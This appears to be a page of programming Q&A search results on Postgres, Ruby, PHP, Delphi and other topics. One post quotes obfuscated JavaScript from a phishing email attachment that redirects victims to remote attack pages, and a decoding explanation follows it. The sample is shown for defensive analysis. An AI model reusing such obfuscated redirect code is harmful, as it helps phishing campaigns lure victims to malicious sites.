Search Results

Search found 2567 results on 103 pages for 'pg pool'.


  • Removing padding from structure in kernel module

    - by dexkid
    I am compiling a kernel module, containing a structure of size 34, using the standard command:

        make -C /lib/modules/$(KVERSION)/build M=$(PWD) modules

    The sizeof(some_structure) is coming as 36 instead of 34, i.e. the compiler is padding the structure. How do I remove this padding? Running make V=1 shows the gcc compiler options passed as:

        make -I../inc -C /lib/modules/2.6.29.4-167.fc11.i686.PAE/build M=/home/vishal/20100426_eth_vishal/organised_eth/src modules
        make[1]: Entering directory `/usr/src/kernels/2.6.29.4-167.fc11.i686.PAE'
        test -e include/linux/autoconf.h -a -e include/config/auto.conf || ( \
        echo; \
        echo "  ERROR: Kernel configuration is invalid."; \
        echo "         include/linux/autoconf.h or include/config/auto.conf are missing."; \
        echo "         Run 'make oldconfig && make prepare' on kernel src to fix it."; \
        echo; \
        /bin/false)
        mkdir -p /home/vishal/20100426_eth_vishal/organised_eth/src/.tmp_versions ; rm -f /home/vishal/20100426_eth_vishal/organised_eth/src/.tmp_versions/*
        make -f scripts/Makefile.build obj=/home/vishal/20100426_eth_vishal/organised_eth/src
        gcc -Wp,-MD,/home/vishal/20100426_eth_vishal/organised_eth/src/.eth_main.o.d -nostdinc -isystem /usr/lib/gcc/i586-redhat-linux/4.4.0/include -Iinclude -I/usr/src/kernels/2.6.29.4-167.fc11.i686.PAE/arch/x86/include -include include/linux/autoconf.h -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -m32 -msoft-float -mregparm=3 -freg-struct-return -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -Wa,-mtune=generic32 -ffreestanding -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -Iarch/x86/include/asm/mach-generic -Iarch/x86/include/asm/mach-default -Wframe-larger-than=1024 -fno-stack-protector -fno-omit-frame-pointer -fno-optimize-sibling-calls -g -pg -Wdeclaration-after-statement -Wno-pointer-sign -fwrapv -fno-dwarf2-cfi-asm -DTX_DESCRIPTOR_IN_SYSTEM_MEMORY -DRX_DESCRIPTOR_IN_SYSTEM_MEMORY -DTX_BUFFER_IN_SYSTEM_MEMORY -DRX_BUFFER_IN_SYSTEM_MEMORY -DALTERNATE_DESCRIPTORS -DEXT_8_BYTE_DESCRIPTOR -O0 -Wall -DT_ETH_1588_051 -DALTERNATE_DESCRIPTORS -DEXT_8_BYTE_DESCRIPTOR -DNETHERNET_INTERRUPTS -DETH_IEEE1588_TESTS -DSNAPTYPSEL_TMSTRENA_TEVENTENA_TESTS -DT_ETH_1588_140_147 -DLOW_DEBUG_PRINTS -DMEDIUM_DEBUG_PRINTS -DHIGH_DEBUG_PRINTS -DMODULE -D"KBUILD_STR(s)=#s" -D"KBUILD_BASENAME=KBUILD_STR(eth_main)" -D"KBUILD_MODNAME=KBUILD_STR(conxt_eth)" -c -o /home/vishal/20100426_eth_vishal/organised_eth/src/eth_main.o /home/vishal/20100426_eth_vishal/organised_eth/src/eth_main.c
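
    A minimal sketch of the usual fix, assuming the 34-byte layout is dictated by hardware or an on-wire format (the field names below are placeholders, not the real structure): marking the structure packed tells gcc to insert no padding at all.

        /* Hypothetical layout standing in for the real 34-byte structure. */
        struct some_structure {
            unsigned short hdr;    /* 2 bytes */
            unsigned int   addr;   /* 4 bytes */
            /* ... remaining fields adding up to 34 bytes ... */
        } __attribute__((packed)); /* gcc: no padding between or after members */

        /* In kernel code, a compile-time guard catches regressions: */
        /* BUILD_BUG_ON(sizeof(struct some_structure) != 34); */

    Note that packed structures can force slower, unaligned member accesses on some architectures, so this is normally reserved for layouts you don't control.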

    Read the article

  • An implementation of Sharir's or Aurenhammer's deterministic algorithm for calculating the intersect

    - by RGrey
    The problem of finding the intersection/union of N discs/circles on a flat plane was first proposed by M. I. Shamos in his 1978 thesis:

        Shamos, M. I. “Computational Geometry” Ph.D. thesis, Yale Univ., New Haven, CT, 1978.

    Since then, in 1985, Micha Sharir presented an O(n log^2 n) time and O(n) space deterministic algorithm for the disc intersection/union problem (based on modified Voronoi diagrams):

        Sharir, M. Intersection and closest-pair problems for a set of planar discs. SIAM J. Comput. 14 (1985), pp. 448-468.

    In 1988, Franz Aurenhammer presented a more efficient O(n log n) time and O(n) space algorithm for circle intersection/union using power diagrams (generalizations of Voronoi diagrams):

        Aurenhammer, F. Improved algorithms for discs and balls using power diagrams. Journal of Algorithms 9 (1988), pp. 151-161.

    Earlier, in 1983, Paul G. Spirakis had also presented an O(n^2) time deterministic algorithm, and an O(n) probabilistic algorithm:

        Spirakis, P.G. Very Fast Algorithms for the Area of the Union of Many Circles. Rep. 98, Dept. Comput. Sci., Courant Institute, New York University, 1983.

    I've been searching for any implementations of the algorithms above, focusing on computational geometry packages, and I haven't found anything yet. As none of them appears trivial to put into practice, it would be really neat if someone could point me in the right direction!

    Read the article

  • What does this Javascript do?

    - by nute
    I've just found out that a spammer is sending email from our domain name, pretending to be us, saying: Dear Customer, This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account. We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions. (C) ourwebsite.com (I changed that) The attached file is an HTML file that has the following javascript: <script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script> Another email had this: <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ... Thanks
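
    For what it's worth, the obfuscation undoes by hand: each scrambled string is a URL or property name with junk characters mixed in, and the .replace(/[...]/g, '') call strips the junk back out. Re-running just the replace calls in isolation (a sketch, not the original code) shows what the scripts do:

        // First sample: strip g, J, G, comma and < from the scrambled string
        'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
        // -> "http://mvblaw.com/z.htm"
        'lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, ''); // -> "location"
        'hqrteqfH'.replace(/[Htqag]/g, '');         // -> "href"

        // Second sample decodes the same way:
        'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
            .replace(/[\^H\!9X]/g, '');   // -> "http://lendermedia.com/images/z.htm"

        // Both scripts therefore boil down to:
        // document.location.href = '<attack page URL>';

    In other words, opening the attachment just redirects the victim's browser to an attack page; it says nothing about a vulnerability in your own site, though it does mean your domain is being spoofed as the sender.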

    Read the article

  • What would cause native gem extensions on OS X to build but fail to load?

    - by goodmike
    I am having trouble with some of my rubygems, in particular those that use native extensions. I am on a MacBook Pro with Snow Leopard. I have XCode 3.2.1 installed, with gcc 4.2.1. Ruby 1.8.6, because I'm lazy and a scaredy cat and don't want to upgrade yet. Ruby is running in 32-bit mode. I built this ruby from scratch when my MBP ran OSX 10.4. When I require one of the affected gems in irb, I get a LoadError for the gem extension's bundle file. For example, here's nokogiri dissing me:

        > require 'rubygems'
        => true
        > require 'nokogiri'
        LoadError: Failed to load /usr/local/lib/ruby/gems/1.8/gems/nokogiri-1.4.1/lib/nokogiri/nokogiri.bundle

    This is also happening with the Postgres pg and MongoDB mongo gems. My first thought was that the extensions must not be building right. But gem install wasn't throwing any errors. So I reinstalled with the verbose flag, hoping to see some helpful warnings. I've put the output in a Pastie, and the only warning I see is a consistent one about "passing argument n of ‘foo’ with different width due to prototype." I suspect that this might be an issue from upgrading to Snow Leopard, but I'm a little surprised to experience it now, since I've updated my XCode. Could it stem from running Ruby 1.8.6? I'm embarrassed that I don't know quite enough about my Mac and OSX to know where to look next, so any guidance, even just a pointer to some document I couldn't find via Google, would be most welcome. Michael
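
    One way to test the Snow Leopard theory (a sketch; the paths are examples): compare the architectures in the extension bundle with the architecture of the running ruby, and force a matching rebuild if they disagree.

        # Which architectures does the extension contain?
        file /usr/local/lib/ruby/gems/1.8/gems/nokogiri-1.4.1/lib/nokogiri/nokogiri.bundle

        # Which architecture is ruby itself?
        file `which ruby`

        # If they differ (e.g. the bundle is x86_64 but ruby is i386),
        # rebuild the gem for the matching architecture:
        sudo env ARCHFLAGS="-arch i386" gem install pg

    A ruby built under OSX 10.4 will be 32-bit, while Snow Leopard's toolchain builds extensions 64-bit by default, which produces exactly this builds-fine-then-LoadError pattern.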

    Read the article

  • Delphi, PGDac vs Zeos, Fetch, Lookup?

    - by durumdara
    Hi! I used Zeos to test one thing: does ZTable use fetch techniques, or not? In the future we may migrate our smaller system to PGSQL, and it currently uses "Table" components (as in the BDE, but against an SQL-like server). These tables use real cursors, a "window" of N records, so lookup is very fast, because the Locate/Lookup is started on the server, and only these N records are refreshed, no matter how many records are in the lookup table. PGSQL uses fetch techniques as far as I know, and I tested it with a table (id int, name varchar(100)) and 1 million records. (I also tried this with MySQL.) The adapter is Zeos. Columns: ID, seconds to find, allocated memory in bytes on the client.

        MySQL
        500000     2,761    113 196 344
        1000000    3,214    225 471 232
        313800     0,437    225 471 232
        328066     0,468    225 471 232
        276374     0,390    225 471 232
        905984     1,264    225 471 232
        260253     0,359    225 471 232

        PGSQL
        500000     3,042    113 188 184
        1000000    3,744    225 463 064
        313800     0,436    225 463 064
        328066     0,452    225 463 064
        276374     0,375    225 463 064
        905984     1,295    225 463 064
        260253     0,359    225 463 064
        142023     0,203    225 463 064

    As you see, the records are fetched locally, which causes the 225 MB usage, and searches are a little slow, depending on where in the table the record we must find sits. I want to ask a few more things: a.) Does PGDAC have some technique so we can use lookups without paying for the fetch in memory and seconds? b.) Or can the PG ODBC driver help with this problem via ADO? (As I know, ADO can use server-side cursors.) c.) Does anybody have experience with lookup tables and performance? Is this a critical question or not? (Client memory usage included.) d.) If there is no chance to avoid fetch hell with lookups, what can we do? Server-side joins, and custom code for lookup-field changes without a real Lookup? Thanks for your help: dd

    Read the article

  • How to download .txt file from a url?

    - by Colin Roe
    I produced a text file, saved to a location in the project folder. How do I redirect the user to the URL that contains that text file, so they can download it? CreateCSVFile writes the CSV file to a file path based on a DataTable. Calling code:

        string pth = ("C:\\Work\\PG\\AI Handheld Website\\AI Handheld Website\\Reports\\Files\\report.txt");
        CreateCSVFile(data, pth);

    And the function:

        public void CreateCSVFile(DataTable dt, string strFilePath)
        {
            StreamWriter sw = new StreamWriter(strFilePath, false);
            int iColCount = dt.Columns.Count;
            for (int i = 0; i < iColCount; i++)
            {
                sw.Write(dt.Columns[i]);
                if (i < iColCount - 1)
                {
                    sw.Write(",");
                }
            }
            sw.Write(sw.NewLine);
            // Now write all the rows.
            foreach (DataRow dr in dt.Rows)
            {
                for (int i = 0; i < iColCount; i++)
                {
                    if (!Convert.IsDBNull(dr[i]))
                    {
                        sw.Write(dr[i].ToString());
                    }
                    if (i < iColCount - 1)
                    {
                        sw.Write(",");
                    }
                }
                sw.Write(sw.NewLine);
            }
            sw.Close();
            Response.WriteFile(strFilePath);
            FileInfo fileInfo = new FileInfo(strFilePath);
            if (fileInfo.Exists)
            {
                //Response.Clear();
                //Response.AddHeader("Content-Disposition", "attachment; filename=" + fileInfo.Name);
                //Response.AddHeader("Content-Length", fileInfo.Length.ToString());
                //Response.ContentType = "application/octet-stream";
                //Response.Flush();
                //Response.TransmitFile(fileInfo.FullName);
            }
        }
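
    The commented-out block is close to what's needed; below is a sketch of the usual download pattern (note it replaces the earlier Response.WriteFile call, and Response.End keeps the page markup from being appended to the file):

        FileInfo fileInfo = new FileInfo(strFilePath);
        if (fileInfo.Exists)
        {
            Response.Clear();
            Response.AddHeader("Content-Disposition", "attachment; filename=" + fileInfo.Name);
            Response.AddHeader("Content-Length", fileInfo.Length.ToString());
            Response.ContentType = "application/octet-stream"; // or "text/csv"
            Response.TransmitFile(fileInfo.FullName);
            Response.End(); // stop processing so nothing else is written
        }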

    Read the article

  • PostgreSQL, Foreign Keys, Insert speed & Django

    - by Miles
    A few days ago, I ran into an unexpected performance problem with a pretty standard Django setup. For an upcoming feature, we have to regenerate a table hourly, containing about 100k rows of data, 9M on the disk, 10M indexes according to pgAdmin. The problem is that inserting them by whatever method literally takes ages, up to 3 minutes of 100% disk busy time. That's not something you want on a production site. It doesn't matter if the inserts were in a transaction, or issued via plain INSERT, multi-row INSERT, COPY FROM, or even INSERT INTO t1 SELECT * FROM t2. After noticing this wasn't Django's fault, I followed a trial-and-error route, and hey, the problem disappeared after dropping all foreign keys! Instead of 3 minutes, the INSERT INTO ... SELECT FROM took less than a second to execute, which isn't too surprising for a table <= 20M on disk. What is weird is that PostgreSQL manages to slow down inserts by 180x just by using 3 foreign keys. Oh, and disk activity was pure writing, as everything is cached in RAM; only writes go to the disks. It looks like PostgreSQL is working very hard to touch every row in the referred tables, as 3MB/sec * 180s is way more data than the 20MB this new table takes on disk. There was no WAL for the 180s case; I was testing in psql directly. In Django, add ~50% overhead for WAL logging. Tried @commit_on_success, same slowness; I had even implemented multi-row insert and COPY FROM with psycopg2. That's another weird thing: how can 10M worth of inserts generate 10x 16M log segments? Table layout:

        id serial primary key, a bunch of int32, and 3 foreign keys to:
          - a small table, 198 rows, 16k on disk
          - a large table, 1.2M rows, 59 data + 89 index MB on disk
          - a large table, 2.2M rows, 198 + 210 MB

    So, am I doomed to either drop the foreign keys manually or use the table in a very un-Django way by defining saving bla_id x3 and skip using models.ForeignKey? I'd love to hear about some magical antidote / pg setting to fix this.
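
    If the table really is rebuilt wholesale every hour, one workaround (a sketch with made-up table and constraint names) is to drop the foreign keys, bulk load, and re-add them; re-adding a constraint validates the whole table in one pass instead of firing a per-row check on every insert:

        BEGIN;
        ALTER TABLE new_table DROP CONSTRAINT new_table_small_id_fkey;
        -- ... drop the other two FK constraints the same way ...
        INSERT INTO new_table SELECT * FROM staging;
        ALTER TABLE new_table ADD CONSTRAINT new_table_small_id_fkey
            FOREIGN KEY (small_id) REFERENCES small_table (id);
        -- ... re-add the other two ...
        COMMIT;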

    Read the article

  • postgres - ERROR: operator does not exist

    - by cino21122
    Again, I have a function that works fine locally, but moving it online yields a big fat error... Taking a cue from a response in which someone had pointed out that the number of arguments I was passing wasn't accurate, I double-checked in this situation to be certain that I am passing 5 arguments to the function itself...

        Query failed: ERROR: operator does not exist: point <@> point
        HINT: No operator matches the given name and argument type(s).
        You may need to add explicit type casts.

    The query is this:

        BEGIN;
        SELECT zip_proximity_sum('zc',
            (SELECT g.lat FROM geocoded g LEFT JOIN masterfile m ON g.recordid = m.id WHERE m.zip = '10050' ORDER BY m.id LIMIT 1),
            (SELECT g.lon FROM geocoded g LEFT JOIN masterfile m ON g.recordid = m.id WHERE m.zip = '10050' ORDER BY m.id LIMIT 1),
            (SELECT m.zip FROM geocoded g LEFT JOIN masterfile m ON g.recordid = m.id WHERE m.zip = '10050' ORDER BY m.id LIMIT 1),
            10);

    The PG function is this:

        CREATE OR REPLACE FUNCTION zip_proximity_sum(refcursor, numeric, numeric, character, numeric)
        RETURNS refcursor AS
        $BODY$
        BEGIN
            OPEN $1 FOR
            SELECT r.zip, point($2,$3) <@> point(g.lat, g.lon) AS distance
            FROM geocoded g
            LEFT JOIN masterfile r ON g.recordid = r.id
            WHERE (geo_distance(point($2,$3), point(g.lat,g.lon)) < $5)
            ORDER BY r.zip, distance;
            RETURN $1;
        END;
        $BODY$
        LANGUAGE 'plpgsql' VOLATILE COST 100;
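
    The point <@> point operator (and the geo_distance function next to it) isn't part of core PostgreSQL; both come from the earthdistance contrib module, which depends on the cube module. The likely difference between the two machines is that the module is installed in the local database but not in the online one. A hedged sketch of the fix, depending on the server version:

        -- PostgreSQL 9.1 or later:
        CREATE EXTENSION cube;
        CREATE EXTENSION earthdistance;

        -- Older servers load the contrib SQL scripts instead
        -- (paths vary by install), e.g.:
        -- psql -d yourdb -f /usr/share/postgresql/8.4/contrib/cube.sql
        -- psql -d yourdb -f /usr/share/postgresql/8.4/contrib/earthdistance.sql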

    Read the article

  • postgresql help with php loop....

    - by KnockKnockWhosThere
    I keep getting a "Notice: Undefined index: did" error with this query, and I'm not understanding why... I'm much more used to MySQL, so maybe the syntax is wrong? This is the PHP query code:

        function get_demos() {
            global $session;
            $demo = array();
            $result = pg_query("SELECT DISTINCT(did,vid,iid,value) FROM dv");
            if (pg_num_rows($result) > 0) {
                while ($r = pg_fetch_array($result)) {
                    switch ($r['did']) {
                        case 1: $demo['a'][$r['vid']] = $r['value']; break;
                        case 2: $demo['b'][$r['vid']] = $r['value']; break;
                        case 3: $demo['c'][$r['vid']] = $r['value']; break;
                    }
                }
            } else {
                $session->session_setMessage(2);
            }
            return $demo;
        }

    When I run that query at the pg prompt, I get results:

        "(1,1,1,"A")"
        "(1,2,2,"B")"
        "(1,3,3,"C")"
        "(1,4,4,"D")"
        "(1,5,5,"E")"
        "(1,6,6,"F")"
        "(1,7,7,"G")"
        "(1,8,8,"H")"
        "(1,9,9,"I")"
        "(1,10,A,"J")"
        "(1,11,B,"K")"
        "(1,12,C,"L")"
        "(1,13,D,"M")"
        "(2,14,1,"A")"
        "(2,15,2,"B")"
        "(2,16,0,"C")"
        "(3,17,1,"A")"
        "(3,18,2,"B")"
        "(3,19,3,"C")"
        "(3,20,4,"D")"
        "(3,21,5,"E")"
        "(3,22,6,"F")"
        "(3,23,7,"G")"
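
    The pasted results give the problem away: with parentheses, DISTINCT(did,vid,iid,value) is parsed as DISTINCT applied to a single composite (row-type) expression, so the result set has one anonymous column and $r['did'] never exists, hence the undefined-index notice. DISTINCT applies to the whole select list and takes no parentheses; a sketch of the fix:

        SELECT DISTINCT did, vid, iid, value FROM dv;

    With four separate columns back in the result set, pg_fetch_array() returns the 'did', 'vid' and 'value' keys the switch statement expects, and the PHP code can stay as it is.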

    Read the article

  • select option clears when page loads in php

    - by user79685
    Hey guys, the scenario is this: see the select below.

        <form name="limit">
          <select name="limiter" onChange="limit(this.value)">
            <option selected="selected">&nbsp;</option>
            <option value="5">5</option>
            <option value="10">10</option>
            <option value="15">15</option>
          </select>
        </form>

    Whenever any option is selected, I want 3 things to happen: 1.) The js limit() function is called. All it does is take the current URL and add a new query parameter 'limit' with the user-selected value, e.g.: http://localhost/blahblah/apps/category.php?pg=1&catId=3021&limit=5 (this causes the category.php page to be hit and the number of products displayed limited to the value selected by the user). 2.) Once the URL is hit, the page reloads, but I DON'T want the selected value to reset back to the default (which it currently does). I want it to reflect the user's selection after the page reload. 3.) Also, when I move to the next page (pagination), I would like the state to be carried over to the next page (i.e. remembering the user's selection).
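
    For point 2, the reload loses the choice because the markup always marks the blank option as selected. Since limit comes back in the query string, the page can emit the attribute itself; a sketch, assuming this form is rendered by category.php:

        <?php $limit = isset($_GET['limit']) ? (int)$_GET['limit'] : 0; ?>
        <form name="limit">
          <select name="limiter" onChange="limit(this.value)">
            <option value=""<?php if (!$limit) echo ' selected="selected"'; ?>>&nbsp;</option>
            <?php foreach (array(5, 10, 15) as $n): ?>
              <option value="<?php echo $n; ?>"<?php if ($limit == $n) echo ' selected="selected"'; ?>><?php echo $n; ?></option>
            <?php endforeach; ?>
          </select>
        </form>

    For point 3, carrying the same limit parameter in each pagination link keeps the selection across pages.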

    Read the article

  • Can't get rails app to start on heroku

    - by jonnii
    I'm trying to deploy a rails app to heroku, but keep getting the following error. I'd have thought that managing the postgres gems would be something heroku would handle. I've tried everything I can think of short of installing postgres on my local machine, which I'd need to do if I wanted to install the postgres gem. There's also no gem called activerecord-postgresql-adapter... I'm guessing this is the standard adapter that comes with rails?? Any thoughts on how to fix this?

        App failed to start
        /usr/local/lib/ruby/gems/1.8/gems/activerecord-2.3.5/lib/active_record/connection_adapters/abstract/connection_specification.rb:76:in `establish_connection': Please install the postgresql adapter: `gem install activerecord-postgresql-adapter` (no such file to load -- pg) (RuntimeError)
            from /usr/local/lib/ruby/gems/1.8/gems/activerecord-2.3.5/lib/active_record/connection_adapters/abstract/connection_specification.rb:60:in `establish_connection'
            from /usr/local/lib/ruby/gems/1.8/gems/activerecord-2.3.5/lib/active_record/connection_adapters/abstract/connection_specification.rb:55:in `establish_connection'
            from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:438:in `initialize_database'
            from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:141:in `process'
            from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:113:in `send'
            from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:113:in `run'
            from /disk1/home/slugs/135415_c7f31f0_9f1f/mnt/config/environment.rb:9
            from /usr/local/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require'
            ... 14 levels...
            from /usr/local/lib/ruby/gems/1.8/gems/rack-1.0.1/lib/rack/builder.rb:29:in `instance_eval'
            from /usr/local/lib/ruby/gems/1.8/gems/rack-1.0.1/lib/rack/builder.rb:29:in `initialize'
            from /home/heroku_rack/heroku.ru:1:in `new'
            from /home/heroku_rack/heroku.ru:1
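
    A guess at the cause: "activerecord-postgresql-adapter" is indeed just the adapter bundled with ActiveRecord, and the real complaint is "no such file to load -- pg", i.e. the pg gem was never installed in the slug because it isn't declared anywhere. On a Rails 2.3 app the usual fix is to declare it, e.g. in config/environment.rb:

        Rails::Initializer.run do |config|
          # ...
          config.gem 'pg'
        end

    If I remember Heroku's old stack correctly, a .gems manifest file at the project root containing the single line "pg" achieved the same thing.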

    Read the article

  • Creation of Objects: Constructors or Static Factory Methods

    - by Rachel
    I am going through Effective Java, and some of the things I considered standard are not what the book suggests. For instance, with object creation I was under the impression that constructors are the best way of doing it, while the book says we should make use of static factory methods. I am not able to follow a few of the advantages and disadvantages, so I am asking this question. Here are the benefits as the book gives them.

    Advantages:
    1. One advantage of static factory methods is that, unlike constructors, they have names.
    2. A second advantage is that, unlike constructors, they are not required to create a new object each time they're invoked.
    3. A third advantage is that, unlike constructors, they can return an object of any subtype of their return type.
    4. A fourth advantage is that they reduce the verbosity of creating parameterized type instances. (I am not able to understand this advantage and would appreciate it if someone could explain this point.)

    Disadvantages:
    1. The main disadvantage of providing only static factory methods is that classes without public or protected constructors cannot be subclassed.
    2. A second disadvantage is that they are not readily distinguishable from other static methods. (I am not getting this point either, so I would really appreciate some explanation.)

    Reference: Effective Java, Joshua Bloch, 2nd Edition, pp. 5-10. Also, how do I decide whether to go for a constructor or a static factory method for object creation?
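
    A small sketch may make advantages 2-4 concrete: the factory can hand back a cached instance, its declared return type can hide which subclass the caller actually gets, and a generic factory lets the compiler infer type parameters (Bloch's advantage 4, which Java 7's diamond operator later made largely moot):

        import java.util.HashMap;

        public abstract class Shape {
            private static final Shape UNIT_CIRCLE = new Circle(1.0);

            // Advantage 1: the method has a name; advantage 2: it can
            // return the same cached instance on every call.
            public static Shape unitCircle() { return UNIT_CIRCLE; }

            // Advantage 3: declared return type Shape, actual type a hidden subclass.
            public static Shape circleOf(double radius) { return new Circle(radius); }

            // Advantage 4 (pre-Java 7): the compiler infers K and V here, instead of
            // the caller repeating them as in
            //   Map<String, List<String>> m = new HashMap<String, List<String>>();
            public static <K, V> HashMap<K, V> newHashMap() { return new HashMap<K, V>(); }

            private static final class Circle extends Shape {
                private final double radius;
                Circle(double radius) { this.radius = radius; }
            }
        }

    As for choosing: Bloch's own advice in that item is to consider static factories first and fall back to public constructors when none of the advantages apply, keeping the subclassing disadvantage above in mind.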

    Read the article

  • How to disable the button based on Grid rows count using jquery

    - by kumar
    Hello friends, I have a button on the view. I need to disable it based on the row count in the jQuery grid: if fewer than 100 rows come back, I need to disable that button. Any idea about this? Here is my code:

        <script type="text/javascript">
            $(document).ready(function() {
                var RegisterGridEvents = function(excGrid) {
                    //Register column chooser
                    $(excGrid).jqGrid('navButtonAdd', excGrid + '_pager', {
                        caption: "Columns",
                        title: "Reorder Columns",
                        onClickButton: function() {
                            $(excGrid).jqGrid('columnChooser');
                        }
                    });
                    $(".ui-pg-selbox").hide();
                    $('.ui-jqgrid-htable th:first').prepend('Select All').attr('style', 'font-size:7px');
                    //Register grid resize
                    $(excGrid).jqGrid('gridResize', { minWidth: 350, maxWidth: 1500, minHeight: 400, maxHeight: 12000 });
                };
                $('#specialist-tab').tabs("option", "disabled", [2, 3, 4]);
                $('.button').button();
                RegisterButtonEvents();
                RegisterGridEvents("#ExceptionsGrid")
            });

            var a = $("#ExceptionsGrid").jqGrid('getGridParam', 'records').toString();
            alert(a);
        </script>

    Is this the right place to be doing this? Thanks
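
    A sketch of the idea, assuming the button has id #MyButton (adjust the selector): the records count is only meaningful once the grid has loaded, so the safe place to toggle the button is jqGrid's loadComplete event rather than straight-line code in the script.

        $("#ExceptionsGrid").jqGrid('setGridParam', {
            loadComplete: function (data) {
                // Runs after each load, once the row data is in the grid.
                var rows = parseInt($("#ExceptionsGrid").jqGrid('getGridParam', 'records'), 10);
                // jQuery UI button: disable when fewer than 100 rows came back.
                $("#MyButton").button("option", "disabled", rows < 100);
            }
        });

    That also explains why the alert(a) at the bottom of the script fires too early: it runs while the page is still loading, before the grid has fetched anything.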

    Read the article

  • Calculating and saving space in Postgresql

    - by punkish
    I have a table in Pg like so:

        CREATE TABLE t (
            a BIGSERIAL NOT NULL, -- 8 b
            b SMALLINT,           -- 2 b
            c SMALLINT,           -- 2 b
            d REAL,               -- 4 b
            e REAL,               -- 4 b
            f REAL,               -- 4 b
            g INTEGER,            -- 4 b
            h REAL,               -- 4 b
            i REAL,               -- 4 b
            j SMALLINT,           -- 2 b
            k INTEGER,            -- 4 b
            l INTEGER,            -- 4 b
            m REAL,               -- 4 b
            CONSTRAINT a_pkey PRIMARY KEY (a)
        )

    The above adds up to 50 bytes per row. My experience is that I need another 40% to 50% for system overhead, without even any user-created indexes on the above. So, about 75 bytes per row. I will have many, many rows in the table, potentially upward of 145 billion rows, so the table is going to be pushing 13-14 terabytes. What tricks, if any, could I use to compact this table? My possible ideas below:

    - Convert the REAL values to INTEGERs. If they can be stored as SMALLINT, that is a saving of 2 bytes per field.
    - Convert the columns b .. m into an array. I don't need to search on those columns, but I do need to be able to return one column's value at a time. So, if I need column g, I could do something like SELECT a, arr[5] FROM t;

    Would I save space with the array option? Would there be a speed penalty? Any other ideas?
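
    A hedged sketch of the array variant for comparison (assuming all of b..m fit in SMALLINT; counting b as element 1, column g lands at index 6 in 1-based PostgreSQL arrays):

        CREATE TABLE t_arr (
            a    BIGSERIAL NOT NULL,
            vals SMALLINT[],  -- columns b..m packed into one array
            CONSTRAINT t_arr_pkey PRIMARY KEY (a)
        );

        -- Fetch what used to be column g:
        SELECT a, vals[6] AS g FROM t_arr;

    One caution: a PostgreSQL array carries roughly 24 bytes of its own header, so with only twelve 2-byte elements the array variant may not save anything; it is worth measuring on a sample before committing.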

    Read the article

  • PostgreSQL: return select count(*) from old_ids;

    - by Alexander Farber
    Hello, please help me with 1 more PL/pgSQL question. I have a PHP script run as a daily cronjob, deleting old records from 1 main table and a few further tables referencing its "id" column:

        create or replace function quincytrack_clean()
        returns integer as $BODY$
        begin
            create temp table old_ids (id varchar(20)) on commit drop;

            insert into old_ids
            select id from quincytrack
            where age(QDATETIME) > interval '30 days';

            delete from hide_id where id in (select id from old_ids);
            delete from related_mks where id in (select id from old_ids);
            delete from related_cl where id in (select id from old_ids);
            delete from related_comment where id in (select id from old_ids);
            delete from quincytrack where id in (select id from old_ids);

            return select count(*) from old_ids;
        end;
        $BODY$ language plpgsql;

    And here is how I call it from the PHP script:

        $sth = $pg->prepare('select quincytrack_clean()');
        $sth->execute();
        if ($row = $sth->fetch(PDO::FETCH_ASSOC))
            printf("removed %u old rows\n", $row['count']);

    Why do I get the following error?

        SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "select"
        at character 9 QUERY: SELECT select count(*) from old_ids
        CONTEXT: SQL statement in PL/PgSQL function "quincytrack_clean" near line 23

    Thank you! Alex
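
    The failing line is the last one in the function body: in PL/pgSQL, RETURN takes an expression, not a bare SELECT statement, so "return select count(*) ..." gets handed to the SQL engine as the nonsense "SELECT select count(*) ...". Two sketches of the fix:

        -- Option 1: wrap the query as a scalar subquery
        return (select count(*) from old_ids);

        -- Option 2: capture the count into a variable first
        -- (add "removed integer;" to a DECLARE section)
        select count(*) into removed from old_ids;
        return removed;

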